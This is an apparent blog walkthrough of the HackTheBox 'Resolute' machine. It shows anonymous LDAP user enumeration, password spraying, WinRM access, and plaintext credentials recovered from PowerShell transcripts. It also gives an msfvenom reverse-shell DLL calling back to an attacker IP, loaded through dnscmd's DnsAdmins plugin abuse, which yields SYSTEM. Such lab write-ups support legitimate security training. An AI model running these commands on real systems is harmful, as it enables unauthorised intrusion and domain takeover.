HTB - Resolute

Nmap

nmap -sC -sV -p- -oN nmap/allports 10.10.10.169

The NMAP scan reveals some names we can add to our /etc/hosts file.

 

SMB ( fail)

At least we found out what the password policy for this domain.

 

Ldap

We will be able to find more information by querying LDAP.

Run: ldapsearch -h 10.10.10.169 -x -s base namingcontexts

Run: ldapsearch -h 10.10.10.169 -x - -b "DC=megabank,DC=local"

We get a large output of users which becomes quite messy, we can refine this query by running the LDAP query below.

ldapsearch -h 10.10.10.169 -x -b "DC=megabank,DC=local" '(objectclass=person)' > persons.txt

We can further refine this and grab a list a usernames.

Run: cat persons.txt| grep -i samaccountname | awk '{print $2}' > userspray.txt 

Awesome we got some user names we can try lets try running Impackets-GetNPUsers ( this checks if the users have the flag “ Do not require Kerberos preauthentication” set and exports a hash)

 

No luck. With that not working its best to see what else we can further enumerate encase we missed something before we try to brute force something.

I started reading manually looking through the LDAP query and I found this:

Okay awesome lets try use these credentials. This could also be a password that is used in this domain that they use for new users or when they reset passwords.

Okay no luck there, but we got password we can try with all our usernames.

Another fail. I also thought if I could spray SMB, lets give other options with crackmapexec a go, like winrm.

Awesome success! We can now try to use evil-winrm to remote into the target.

Run: evil-winrm -I 10.10.10.169 -u melanie -p <password>

 

Now we can go and collect the user flag.

 

Privilege Escalation

For this part here scripts and tools will not work to get you the next part, I tried using winpeas and bloodhound and nothing came up that we could use in this scenario.

So, the best thing to do next was search around. Remember that this is a CTF, there is going to be way to get the root flag.

Searching through all directories both visible and hidden. Looking at the root of C:\ we find a find a directory called PSTranscripts.

 

Keep going down the directory till you find the txt file called PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt. Reading the file, we see Ryan’s password left in plain text for us take.

 

With Ryan’s credentials we can now remote into the machine as him.

 

Looking through directories again checking Ryan’s profile first we see a note left on his desktop.

This makes me wonder as to what could be the next thing to check.

I ran: whoami /all

Okay, we see he is a part of dnsadmins. When I was studying for the MSCA and CCNA, It was brought up in class that if a hacker got a control over the DNS it would be extremely troublesome.

A quick google search leads me to this: From DnsAdmins to SYSTEM to Domain Compromise - Red Teaming Experiments (ired.team)

After having read of that, its clear that will need to upload a shell because we do not have an interactive session.

Note: The correct way to generate a shell without essentially stopping DNS when we generate a shell, will be by making a DLL and threading it so the DNS will still work. I have not coded in a C language in a long time, so I am quite rusty. Later this year after I finish some certifications, I will make DNS persistence reverse shell code and place it my GitHub I will add it to this walkthrough later in the year.

 

So, we can generate a shell with msfvenom.

Run: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.69 LPORT=9001 -f dll -o rev.dll

Then we just need to set up and SMB server so we can retrieve the shell

Run: sudo impacket-smbserver (name) $(pwd)

 

Now back to our winrm session, make sure you also have a  netcat listener set up.

Run the following commands.

dnscmd 10.10.10.169 /config /serverlevelplugindll \< your ip>\share\rev.dl

sc.exe stop dns

sc.exe start dns

 

We can now go and get the root flag.

 

Conclusion

This was quite a fun box and its quite easy to find where to go next if you just keep looking. It covers exploiting LDAP because it is misconfigured, and you can gather so much information without any credentials and exploiting DNS and doing DLL injection.